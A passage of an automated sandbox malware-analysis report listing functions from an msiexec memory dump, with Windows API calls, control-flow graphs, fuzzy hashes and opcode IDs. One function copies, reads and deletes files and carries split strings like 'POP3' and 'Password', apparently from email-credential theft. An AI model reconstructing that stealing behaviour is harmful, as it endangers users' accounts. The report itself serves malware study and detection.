                                                                            • Instruction Fuzzy Hash: 4331E371900209AFCB24AE78DC84EEB7BFDDB87304F1401E8E91DD7295E6319A458BA0
                                                                            Function 235F4AB4 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000,00000001,235F2082,23602108,0000000C,235F1F3A,?), ref: 235F4AD5
                                                                            • TerminateProcess.KERNEL32(00000000,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000,00000001,235F2082,23602108,0000000C,235F1F3A,?), ref: 235F4ADC
                                                                            • ExitProcess.KERNEL32 ref: 235F4AEE
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: fbc30189958027d1df216fa7e5872160744bb0f60e6291c7f9cc63cb9a1c8691
                                                                            • Instruction ID: 92286a68bb62707db5f0d577b77d59980484286e6a8c26e76909ef89a688acd7
                                                                            • Opcode Fuzzy Hash: fbc30189958027d1df216fa7e5872160744bb0f60e6291c7f9cc63cb9a1c8691
                                                                            • Instruction Fuzzy Hash: 34E0B676100208AFCF117F66DD09E493BAEFF52341B508055FA4D8B125EB3AE943CA54
                                                                            Function 235F724E Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: HeapProcess
                                                                            • String ID:
                                                                            • API String ID: 54951025-0
                                                                            • Opcode ID: 02b1a3afcf951c7ad8118afd16222736d257a7387701d192c27bae3614c2f99a
                                                                            • Instruction ID: a0b199cb640ef63bd299a23303c178f3ff20a7591f0ca88ceedd1ef3c5dc1b0f
                                                                            • Opcode Fuzzy Hash: 02b1a3afcf951c7ad8118afd16222736d257a7387701d192c27bae3614c2f99a
                                                                            • Instruction Fuzzy Hash: DDA011302002028F8300AE30820A20C3AECFA22282328002AA80CC0008FB28C0028A00
                                                                            Function 235F8EC8 Relevance: .1, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalEnterSection
                                                                            • String ID:
                                                                            • API String ID: 1904992153-0
                                                                            • Opcode ID: e42394f4babbb5e6466844ab6ee51f12682bbc41703e4f35b4ee518ed6e5d288
                                                                            • Instruction ID: c4aa098bcbe5cbf4ea655da1e4753b8ac9c780392a826699222d92fa4e4ca319
                                                                            • Opcode Fuzzy Hash: e42394f4babbb5e6466844ab6ee51f12682bbc41703e4f35b4ee518ed6e5d288
                                                                            • Instruction Fuzzy Hash: DE2190319003088FCB10EB68E480BAD77B5BF66368F3446C8D52CB7290C73DD9458B59
                                                                            Function 235F173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 235F1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D1B
                                                                              • Part of subcall function 235F1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 235F1D37
                                                                              • Part of subcall function 235F1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D4B
                                                                            • _strlen.LIBCMT ref: 235F1855
                                                                            • _strlen.LIBCMT ref: 235F1869
                                                                            • _strlen.LIBCMT ref: 235F188B
                                                                            • _strlen.LIBCMT ref: 235F18AE
                                                                            • _strlen.LIBCMT ref: 235F18C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$File$CopyCreateDelete
                                                                            • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                            • API String ID: 3296212668-3023110444
                                                                            • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction ID: 6256500f803eb95289c02468895c49b41bad76cc20052489523c9d5cbd6a5403
                                                                            • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                            • Instruction Fuzzy Hash: A9610271D00318AAEF21DBA4E940BDEB7B9AF57200F4444DAD209A7250DB749B478B96
                                                                            Function 235F19B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: %m$~$Gon~$~F@7$~dra
                                                                            • API String ID: 4218353326-230879103
                                                                            • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction ID: 1b3f8842eca3d5570e46b5b3c79a79646d0b7125aff0c8e9fb5a3a93280442cf
                                                                            • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                            • Instruction Fuzzy Hash: E071F7B1D002286BDF21ABB4A894ADF7BFCAF56300F1440D6D64CE7241E675D786CBA0
                                                                            Function 235F7CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 203 235f7cc2-235f7cd6 204 235f7cd8-235f7cdd 203->204 205 235f7d44-235f7d4c 203->205 204->205 206 235f7cdf-235f7ce4 204->206 207 235f7d4e-235f7d51 205->207 208 235f7d93-235f7dab call 235f7e35 205->208 206->205 209 235f7ce6-235f7ce9 206->209 207->208 211 235f7d53-235f7d90 call 235f571e * 4 207->211 217 235f7dae-235f7db5 208->217 209->205 212 235f7ceb-235f7cf3 209->212 211->208 215 235f7d0d-235f7d15 212->215 216 235f7cf5-235f7cf8 212->216 222 235f7d2f-235f7d43 call 235f571e * 2 215->222 223 235f7d17-235f7d1a 215->223 216->215 219 235f7cfa-235f7d0c call 235f571e call 235f90ba 216->219 220 235f7db7-235f7dbb 217->220 221 235f7dd4-235f7dd8 217->221 219->215 231 235f7dbd-235f7dc0 220->231 232 235f7dd1 220->232 227 235f7dda-235f7ddf 221->227 228 235f7df0-235f7dfc 221->228 222->205 223->222 225 235f7d1c-235f7d2e call 235f571e call 235f91b8 223->225 225->222 235 235f7ded 227->235 236 235f7de1-235f7de4 227->236 228->217 238 235f7dfe-235f7e0b call 235f571e 228->238 231->232 240 235f7dc2-235f7dd0 call 235f571e * 2 231->240 232->221 235->228 236->235 243 235f7de6-235f7dec call 235f571e 236->243 240->232 243->235
                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 235F7D06
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F90D7
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F90E9
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F90FB
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F910D
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F911F
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9131
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9143
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9155
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9167
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F9179
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F918B
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F919D
                                                                              • Part of subcall function 235F90BA: _free.LIBCMT ref: 235F91AF
                                                                            • _free.LIBCMT ref: 235F7CFB
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F7D1D
                                                                            • _free.LIBCMT ref: 235F7D32
                                                                            • _free.LIBCMT ref: 235F7D3D
                                                                            • _free.LIBCMT ref: 235F7D5F
                                                                            • _free.LIBCMT ref: 235F7D72
                                                                            • _free.LIBCMT ref: 235F7D80
                                                                            • _free.LIBCMT ref: 235F7D8B
                                                                            • _free.LIBCMT ref: 235F7DC3
                                                                            • _free.LIBCMT ref: 235F7DCA
                                                                            • _free.LIBCMT ref: 235F7DE7
                                                                            • _free.LIBCMT ref: 235F7DFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: 09d1b9641b676032b4ab0ff4126e8d767c107578f3c41c779c6aaf140767bbfb
                                                                            • Instruction ID: 5544aeeeb2aaa296f992b3d6fe2e4a511b9afe7baf6343892490cf60155a8d4e
                                                                            • Opcode Fuzzy Hash: 09d1b9641b676032b4ab0ff4126e8d767c107578f3c41c779c6aaf140767bbfb
                                                                            • Instruction Fuzzy Hash: E4315C31600705DFEB31AA38F940B6A77F9EF42290F5548A9E84EDB151DE31E980CB14
                                                                            Function 235F59D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _free.LIBCMT ref: 235F59EA
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F59F6
                                                                            • _free.LIBCMT ref: 235F5A01
                                                                            • _free.LIBCMT ref: 235F5A0C
                                                                            • _free.LIBCMT ref: 235F5A17
                                                                            • _free.LIBCMT ref: 235F5A22
                                                                            • _free.LIBCMT ref: 235F5A2D
                                                                            • _free.LIBCMT ref: 235F5A38
                                                                            • _free.LIBCMT ref: 235F5A43
                                                                            • _free.LIBCMT ref: 235F5A51
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 5fa7ce79fa450874bf830f5a9f117c5074b2de16df56b81dd58aa45a41b6e8f6
                                                                            • Instruction ID: ea01b0c068d4b0fa5a7bfaa0453e54c742fb8f33fcb34db159de9cfb6474e8f1
                                                                            • Opcode Fuzzy Hash: 5fa7ce79fa450874bf830f5a9f117c5074b2de16df56b81dd58aa45a41b6e8f6
                                                                            • Instruction Fuzzy Hash: 2011D27A121248EFCB31DF94E840CDD3FB9EF55290B1544E1BA0D8F224DA32EA509B80
                                                                            Function 235F9492 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 287 235f9492-235f94ef GetConsoleCP 288 235f94f5-235f9511 287->288 289 235f9632-235f9644 call 235f2ada 287->289 290 235f952c-235f953d call 235f7c19 288->290 291 235f9513-235f952a 288->291 298 235f953f-235f9542 290->298 299 235f9563-235f9565 290->299 293 235f9566-235f9575 call 235f79e6 291->293 293->289 301 235f957b-235f959b WideCharToMultiByte 293->301 302 235f9609-235f9628 298->302 303 235f9548-235f955a call 235f79e6 298->303 299->293 301->289 304 235f95a1-235f95b7 WriteFile 301->304 302->289 303->289 310 235f9560-235f9561 303->310 306 235f962a-235f9630 GetLastError 304->306 307 235f95b9-235f95ca 304->307 306->289 307->289 309 235f95cc-235f95d0 307->309 311 235f95fe-235f9601 309->311 312 235f95d2-235f95f0 WriteFile 309->312 310->301 311->288 314 235f9607 311->314 312->306 313 235f95f2-235f95f6 312->313 313->289 315 235f95f8-235f95fb 313->315 314->289 315->311
                                                                            APIs
                                                                            • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,235F9C07,?,00000000,?,00000000,00000000), ref: 235F94D4
                                                                            • __fassign.LIBCMT ref: 235F954F
                                                                            • __fassign.LIBCMT ref: 235F956A
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 235F9590
                                                                            • WriteFile.KERNEL32(?,?,00000000,235F9C07,00000000,?,?,?,?,?,?,?,?,?,235F9C07,?), ref: 235F95AF
                                                                            • WriteFile.KERNEL32(?,?,00000001,235F9C07,00000000,?,?,?,?,?,?,?,?,?,235F9C07,?), ref: 235F95E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                            • String ID: [nk/
                                                                            • API String ID: 1324828854-416449849
                                                                            • Opcode ID: 77623a348c5e271c1b4b38187d2ad58bae8d31b82b0308ef7b70f5c21d467329
                                                                            • Instruction ID: 1878f138fe010a01a1fc1361758d042debfaba00764598b55dccc5c2b4f1ea7d
                                                                            • Opcode Fuzzy Hash: 77623a348c5e271c1b4b38187d2ad58bae8d31b82b0308ef7b70f5c21d467329
                                                                            • Instruction Fuzzy Hash: 4051B171900649AFCB10DFA8D895EEEBBF8FF1A300F14455AE559E7281E730D941CBA0
                                                                            Function 235F1CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D1B
                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 235F1D37
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D4B
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D58
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D72
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D7D
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 235F1D8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                            • String ID:
                                                                            • API String ID: 1454806937-0
                                                                            • Opcode ID: c49a29950b229616bacbdcb88f9eda3af5d9cc2d3a33aaf8eb5fbcf21b6f82c4
                                                                            • Instruction ID: 88fff5b7d860a770262623f5e5bb235008817b5d8353f6ac4cef333ead0860e2
                                                                            • Opcode Fuzzy Hash: c49a29950b229616bacbdcb88f9eda3af5d9cc2d3a33aaf8eb5fbcf21b6f82c4
                                                                            • Instruction Fuzzy Hash: C6214CB194121CBFD710ABA09C8CEEA76FCEF6A345F0009A6F519D2144E7749E468A70
                                                                            Function 235F8821 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 216COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 333 235f8821-235f883a 334 235f883c-235f884c call 235f9341 333->334 335 235f8850-235f8855 333->335 334->335 342 235f884e 334->342 336 235f8857-235f885f 335->336 337 235f8862-235f8886 MultiByteToWideChar 335->337 336->337 340 235f888c-235f8898 337->340 341 235f8a19-235f8a2c call 235f2ada 337->341 343 235f88ec 340->343 344 235f889a-235f88ab 340->344 342->335 346 235f88ee-235f88f0 343->346 347 235f88ad-235f88bc call 235fbf20 344->347 348 235f88ca-235f88db call 235f56d0 344->348 350 235f8a0e 346->350 351 235f88f6-235f8909 MultiByteToWideChar 346->351 347->350 360 235f88c2-235f88c8 347->360 348->350 361 235f88e1 348->361 355 235f8a10-235f8a17 call 235f8801 350->355 351->350 354 235f890f-235f892a call 235f5f19 351->354 354->350 365 235f8930-235f8937 354->365 355->341 364 235f88e7-235f88ea 360->364 361->364 364->346 366 235f8939-235f893e 365->366 367 235f8971-235f897d 365->367 366->355 368 235f8944-235f8946 366->368 369 235f897f-235f8990 367->369 370 235f89c9 367->370 368->350 371 235f894c-235f8966 call 235f5f19 368->371 373 235f89ab-235f89bc call 235f56d0 369->373 374 235f8992-235f89a1 call 235fbf20 369->374 372 235f89cb-235f89cd 370->372 371->355 388 235f896c 371->388 378 235f89cf-235f89e8 call 235f5f19 372->378 379 235f8a07-235f8a0d call 235f8801 372->379 373->379 387 235f89be 373->387 374->379 385 235f89a3-235f89a9 374->385 378->379 391 235f89ea-235f89f1 378->391 379->350 390 235f89c4-235f89c7 385->390 387->390 388->350 390->372 392 235f8a2d-235f8a33 391->392 393 235f89f3-235f89f4 391->393 394 235f89f5-235f8a05 WideCharToMultiByte 392->394 393->394 394->379 395 235f8a35-235f8a3c call 235f8801 394->395 395->355
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,235F6FFD,00000000,?,?,?,235F8A72,?,?,00000100), ref: 235F887B
                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,235F8A72,?,?,00000100,5EFC4D8B,?,?), ref: 235F8901
                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 235F89FB
                                                                            • __freea.LIBCMT ref: 235F8A08
                                                                              • Part of subcall function 235F56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 235F5702
                                                                            • __freea.LIBCMT ref: 235F8A11
                                                                            • __freea.LIBCMT ref: 235F8A36
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID: [nk/
                                                                            • API String ID: 1414292761-416449849
                                                                            • Opcode ID: f24649b899ae6ac8083fe42601104ed1f84d9a7cd019b19130accb8263442fbe
                                                                            • Instruction ID: 0b3f1540bc27215a79f2ea21c39c3bd8d25f1f4aeb620670beec31fd20bff93d
                                                                            • Opcode Fuzzy Hash: f24649b899ae6ac8083fe42601104ed1f84d9a7cd019b19130accb8263442fbe
                                                                            • Instruction Fuzzy Hash: 2951F572610216AFDB259F64EC40EAB37B9EB92764F254AA9FD0CD7140EB38DC50C690
                                                                            Function 235F3370 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 398 235f3370-235f33b5 call 235f3330 call 235f37a7 403 235f33b7-235f33c9 398->403 404 235f3416-235f3419 398->404 406 235f3439-235f3442 403->406 407 235f33cb 403->407 405 235f341b-235f3428 call 235f3790 404->405 404->406 410 235f342d-235f3436 call 235f3330 405->410 409 235f33d0-235f33e7 407->409 411 235f33fd 409->411 412 235f33e9-235f33f7 call 235f3740 409->412 410->406 413 235f3400-235f3405 411->413 419 235f340d-235f3414 412->419 420 235f33f9 412->420 413->409 417 235f3407-235f3409 413->417 417->406 421 235f340b 417->421 419->410 422 235f33fb 420->422 423 235f3443-235f344c 420->423 421->410 422->413 424 235f344e-235f3455 423->424 425 235f3486-235f3496 call 235f3774 423->425 424->425 426 235f3457-235f3466 call 235fbbe0 424->426 431 235f34aa-235f34c6 call 235f3330 call 235f3758 425->431 432 235f3498-235f34a7 call 235f3790 425->432 434 235f3468-235f3480 426->434 435 235f3483 426->435 432->431 434->435 435->425
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 235F339B
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 235F33A3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 235F3431
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 235F345C
                                                                            • _ValidateLocalCookies.LIBCMT ref: 235F34B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm$[nk/
                                                                            • API String ID: 1170836740-442316909
                                                                            • Opcode ID: fd30fbf6fcc1bbf750f68d35dc3381841088443f184b51f26f18caf682850bbd
                                                                            • Instruction ID: 8b6632c0c3470836b3376427dee954268cb939ed754032628207317a848232cb
                                                                            • Opcode Fuzzy Hash: fd30fbf6fcc1bbf750f68d35dc3381841088443f184b51f26f18caf682850bbd
                                                                            • Instruction Fuzzy Hash: 4341D434A012089BDF11EF68E888A9EBBF5FF46324F1881D5D91D9B295D739DA01CB90
                                                                            Function 235F925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 235F9221: _free.LIBCMT ref: 235F924A
                                                                            • _free.LIBCMT ref: 235F92AB
                                                                              • Part of subcall function 235F571E: HeapFree.KERNEL32(00000000,00000000,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?), ref: 235F5734
                                                                              • Part of subcall function 235F571E: GetLastError.KERNEL32(?,?,235F924F,?,00000000,?,00000000,?,235F9276,?,00000007,?,?,235F7E5A,?,?), ref: 235F5746
                                                                            • _free.LIBCMT ref: 235F92B6
                                                                            • _free.LIBCMT ref: 235F92C1
                                                                            • _free.LIBCMT ref: 235F9315
                                                                            • _free.LIBCMT ref: 235F9320
                                                                            • _free.LIBCMT ref: 235F932B
                                                                            • _free.LIBCMT ref: 235F9336
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
                                                                            • Associated: 00000006.00000002.4486588162.00000000235F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.4486608229.0000000023606000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_235f0000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                            • Instruction ID: 863a477805da9218115aea4957ebaf8df8939b0e64e6c335482c7fd575416d83
                                                                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                            • Instruction Fuzzy Hash: 33118131541F08FAE670ABB0EC45FCBBBBD9F96700F400C64A69EB6092DA24F5044751
                                                                            Function 235F4B39 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 480 235f4b39-235f4b61 GetModuleHandleExW 481 235f4b86-235f4b8a 480->481 482 235f4b63-235f4b76 GetProcAddress 480->482 483 235f4b8c-235f4b8f FreeLibrary 481->483 484 235f4b95-235f4ba2 call 235f2ada 481->484 485 235f4b78-235f4b83 482->485 486 235f4b85 482->486 483->484 485->486 486->481
                                                                            APIs
                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,235F4AEA,?,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000), ref: 235F4B59
                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 235F4B6C
                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,235F4AEA,?,?,235F4A8A,?,23602238,0000000C,235F4BBD,00000000,00000000,00000001,235F2082), ref: 235F4B8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.4486608229.00000000235F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 235F0000, based on PE: true
